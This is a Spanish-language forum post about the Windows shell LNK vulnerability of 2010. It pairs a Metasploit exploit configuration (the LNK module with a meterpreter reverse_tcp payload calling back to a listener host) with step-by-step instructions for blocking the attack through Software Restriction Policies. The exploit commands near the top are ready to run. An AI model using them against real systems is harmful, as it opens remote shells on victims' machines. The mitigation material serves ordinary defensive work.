Por un lado les presentare la solucion mediante las Directivas de Restriccion de Software, y por el otro el Poc de Metasploit para ejecutarlo.
Para los que no esten al tanto les paso un Advisory sobre el tema.
[Enlace externo eliminado para invitados] ... 86198.mspx
Por un lado ya existe el Poc de Metasploit, les recomiendo antes que nada actualizar el framework
con el comando "svn update"
Código: Seleccionar todo
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
[Gracias a Leo Pigñer por la entrada en su blog, y las buenas recomendaciones sobre MSF, y claro esta por la onda ]
Ahora en nuestro equipo como evitar este ataque de forma muy casera hasta que MS saque su parche? que seguramente no compartira el siglo que companter el resto de los parches.
Para aplicar la directiva hay que acceder desde el panel de control, herramientas administrativas: Directiva de seguridad Local.
La primera vez que se accede a las Directivas de restricción de software, es necesario crearlas pulsando sobre el botón derecho en esa carpeta.
Posteriormente se añadirá la ruta de los discos duros donde se encuentren ficheros de sistema y que serán excluidos de la directiva. Añadiendo una nueva ruta dentro de las "Reglas adicionales", en el ejemplo el disco es C:
Para evitar la vulnerabilidad, además de los archivos ejecutables EXE, también hay que añadir las librerías DLL. En las propiedades de "Obligatoriedad", seleccionando "Todos los archivos de software"
Por último, se modificará el funcionamiento de listas negras a listas blancas. Dentro de Niveles de Seguridad, en las propiedades de "No permitido": Establecer como predeterminado.
Segun la gente de Security By Default esto es aplicable a una GPO en una red lan para aplicar como nueva politica via red.
Sin mas, este es mi primer post en la comuniddad, les envio un abrazo dede Argentina !!